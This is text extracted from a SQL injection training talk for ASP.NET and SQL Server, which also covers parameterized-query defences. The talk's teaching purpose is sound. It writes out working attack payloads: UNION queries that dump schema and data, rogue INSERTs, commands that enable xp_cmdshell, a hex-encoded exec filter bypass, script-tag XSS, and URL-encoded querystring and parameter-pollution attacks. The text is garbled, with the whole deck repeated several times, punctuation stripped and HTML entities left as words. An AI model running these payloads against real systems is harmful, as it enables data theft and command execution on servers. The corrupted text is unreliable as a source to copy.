bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Companies Which Should Have Cared
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
Has Sony Been Hacked This Week
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
ndash Translates to ldquoselect table_schemahelliprdquo
HTTP Parameter Pollution
bull HTTP Parameter Pollution is something most people donrsquot even think about ndash It doesnrsquot help that different platforms react in different
waysmdashconcatenate ignore all but the last etc
Effects On Different Platforms
httpswwwowasporgimagesbbaAppsecEU09_CarettoniDiPaola_v08pdf
Doing It Right Parameterized Queries
bull The right way to do it
ndash All parameters created using SqlParamter
ndash Not necessary to use stored procedures though in SQL Server this is preferable
bull Stored Procedure-Driven Test not susceptible to SQL injection You are safe from this issue
bull Secure Query-Driven Test not susceptible either
Adding Dynamic SQL Into The Mix
bull Basic insecure dynamic SP bull create procedure BadProc
Filter nvarchar(500)
as
declare sql varchar(250)
set sql = lsquoselect from table where
Name like lsquorsquorsquo + Filter + lsquorsquorsquorsquo
exec(sql)
bull The basic problem is the same as in the query-driven injection example that Filter is not sanitized or parameterized
Attacking Insecure Dynamic SPs
bull Easy to perform attacks on unprotected dynamic stored procedures from SSMS
bull exec BadProc Filter=SHOOOO
UNION select TABLE_SCHEMA +
+ TABLE_NAME 1 1 from
INFORMATION_SCHEMATABLES--
bull Parameterized queries prevent this from being an issue in ASPNET
Protecting Your Dynamic SPs
bull Use sp_executesql ndash Could also use a combo of QUOTENAME and REPLACE
bull Include the parameter as a parameter inside the sql to run
bull Example declare sql nvarchar(max) set sql = select ProductSubcategory
ID ProductCategoryID
Name from ProductionProductSubcatego
ry where Name like Filter
exec sp_executesql sql NFilter
varchar(200) Filter
bull Once you do this you are completely safe from SQL injection
Recap What To Do
bull Parameterize Your Queries ndash Use SqlParameter to handle input in ASPNet ndash Use sp_executesql correctly when you do use dynamic SQL
bull Understand your data domain ndash Correct data sizes (not too large) ndash Input field has correct length ndash Regular expressions for well-defined field types (eg phone number
Social Security Number) bull Blacklists usually donrsquot work but whitelists can
bull Create limited-access accounts for web applications bull Constraints in UI business objects and database
ndash Defense in depth ndash This isnrsquot really a violation of DRY ndash If I can beat two of your three checks the third could still stop me
Next Steps
bull Automation
ndash Havij (most popular easy GUI)
ndash Sqlmap (my favorite)
ndash BSQL Hacker (blind SQL injection)
ndash BBQSQL (Python-based blind SQL injection)
ndash Fast-Track (Metasploit module)
ndash Plenty more where this came from
bull Really evil stuff
QampA
Kevin Feasel feaselklgmailcom
But Irsquom Just One Man What Can I Do
bull As an attacker ndash Get schema information ndash Get protected data ndash Perform ldquoadministrativerdquo tasks
bull Create bogus user accounts (including admins) bull Create drop alter tables or views bull Delete update or insert data
ndash Run arbitrary executable code
bull As a defender ndash Protecting against SQL injection is stupid easy in
ASPNET
Jumping Right In
bull Defense requires knowledge
ndash To defend against SQL injection we must know how to perform SQL injection
bull Demo Setup
If you know the enemy and know yourself you need not fear the result of a hundred battles If you know yourself but not the enemy for every victory gained you will also suffer a defeat If you know neither the enemy nor yourself you will succumb in every battle ndash Sun Tzu The Art of War
Danger Will Robinson
Need a reason to update your resume Try putting this code on a production machine Goofus would bull Hack naked bull Exploit external sites bull Point out that reacutesumeacute
is spelled with e-acutes
Demo Time Put On Your Safety Goggles
bull Starting in SQL Server Management Studio
ndash Treat this as your lab
bull Open up SQL Profiler
ndash Watch the actual queries as they pass through
bull Get rolling with Demo 1
What Went Wrong
bull SQL injection works by getting lsquooutsidersquo the parameter
bull We werenrsquot able to
bull Lesson 1 canrsquot inject static SQL directly
bull Dynamic SQL ndash Ad hoc query
ndash T-SQL Dynamic SQL
Demo 2 Win Or Yoursquore Out Of The Family
bull Try this again using dynamic SQL
bull Survey says Success
bull Lesson 2 Using unsecured dynamic SQL we can successfully attack
bull Now wersquore ready to look at practical applications
Anatomy of a SQL injection attack
bull Basic SQL query looks like ldquoselect [cols] from [table] where [filter] like
lsquordquo + Filter + ldquorsquordquo
bull SQL comment line --
bull Example of a potential attack Filter = ldquoboorsquo OR 1 = 1 --rdquo
bull Turns into ldquoselect [cols] from [table] where [filter] like
lsquoboorsquo OR 1 = 1 --rdquo
The Naiumlve Developer
bull Basic task load a grid based upon filtering criteria entered into a text box
bull Our naiumlve developer hits the Googles and finds out how to use a SqlDataReader
bull The code works searches are successful ndash Even checks the filter to make
sure a value exists
Having Fun With The Naiumlve Developer
bull f OR 1 = 1--
ndash Bypass the filter list all records
bull Not fun enough Gimme more bull SHOOOO UNION select TABLE_SCHEMA + +
TABLE_NAME 1 1 from INFORMATION_SCHEMATABLES--
ndash Pick a name which doesnrsquot exist now we have a list of tables
bull SHOOOO UNION select COLUMN_NAME + + DATA_TYPE case when IS_NULLABLE = NO then 0 else 1 end ORDINAL_POSITION from INFORMATION_SCHEMACOLUMNS WHERE TABLE_NAME = ProductSubcategory and TABLE_SCHEMA = Production-- ndash Recon on a particular table
bull SHOOOO UNION select Name ProductSubcategoryID ProductCategoryID from ProductionProductSubcategory-- ndash Looking at the actual data in that table
Having Fun With The Naiumlve Developer
bull SHOOOO insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 Evil Hacker Subcategory newid() current_timestamp)-- ndash Boom Exploit complete
bull nada exec sp_configure show advanced options 1 reconfigure exec sp_configure xp_cmdshell 1 reconfigure -- ndash Turn on xp_cmdshell letting us run external apps
Our Developerrsquos Response
bull Users mention this ldquoevil hacker subcategoryrdquo Developer investigates
bull More internet searching dev learns about blacklisting and creates a filter for his filter
ndash No more of this ldquoselectrdquo and ldquoinsertrdquo rubbish
In Retrospecthellip
bull Problem the little old ladies using our program just got scared because they looked for the ldquoSelectedrdquo subcategory
Back To The Drawing Board
bull Need a slightly less naiumlve approach to filtering
bull Our developer has a stroke of genius evil hackers need to use ldquoselectrdquo + space whereas our little old ladies would use ldquoselectrdquo without a space We now have a separating equilibrium
bull Problem yoursquore doing it wrong
bull Proof SHOOOO UNION select TABLE_SCHEMA + + TABLE_NAME
1 1 from INFORMATION_SCHEMATABLES--
ndash Yeah thatrsquos a tab (hex 09) Other valid separators 0A 0B 0C 0D A0
150 Copy-Pastes Laterhellip
bull After adding various permutations of SQL commands + separatorshellip
bull declare shmoo varchar(8000) set
shmoo =
CAST(0x73656C656374095441424C455F5343
48454D41202B20272E27202B205441424C455
F4E414D45206173204E616D652C2031206173
2049734163746976652C203120617320536F7
2744F726465722066726F6D20494E464F524D
4154494F4E5F534348454D412E5441424C455
3 as varchar(8000)) exec(shmoo)
Translating The Varbinary
bull select cast(select
TABLE_SCHEMA + +
TABLE_NAME as Name 1 as
IsActive 1 as SortOrder from
INFORMATION_SCHEMATABLES as
varbinary(8000))
bull Important note this wonrsquot
combine data together
ndash Varbinary runs are better for insertupdatedelete operations
Other Fun Stuff We Can Do
bull select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 lta href=httpwwwgooglecomgtHacker Domainltagt newid() current_timestamp) as varbinary(8000)) ndash Add in undesired links Hint from Heloise this
looks suspiciously like the beginning of a cross-site scripting attack
Other Fun Stuff We Can Do
select CAST(insert into ProductionProductSubcategory(ProductCategoryID Name rowguid ModifiedDate) values(1 ltscript type=textjavascriptgtalert(A)ltscriptgt newid() current_timestamp) as varbinary(8000))
Querystring Injection
bull Helpful table to understand querystring injection
Hex Code Character
09 Tab
20 Space
25
27 lsquo
2B +
2C
2D -
2E
3D =
Querystring Injection
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720or2013D12D2D ndash Translates to ldquobikersquo or 1=1--rdquo
bull The way we did the Slightly Less Naiumlve Stop actually helps us here by preventing some querystring attacks httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=bike252720union20select20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D ndash That ldquoselect20rdquo is equivalent to ldquoselect ldquo
Querystring Injection
bull Injecting other whitespace characters is as easy as 09hellipor 0Ahellip
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select09table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
HTTP Parameter Pollution
bull In ASPNET including a parameter multiple times causes the different entries to be concatenated and separated by commas
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=36ampsearch=jumpampsearch=street ndash Turns into ldquo36jumpstreetrdquo in our search
bull This can be used for evil ndash Any guesses how
HTTP Parameter Pollution
bull httplocalhostSQLInjectionWorkbenchQueryDrivenaspxsearch=prevention252720union20select2F2Aampsearch=2A2F20table_schema2B272E272BTABLE_NAME20as20Name2C12C120from20information_schematables2D2D
ndash 2F2A =
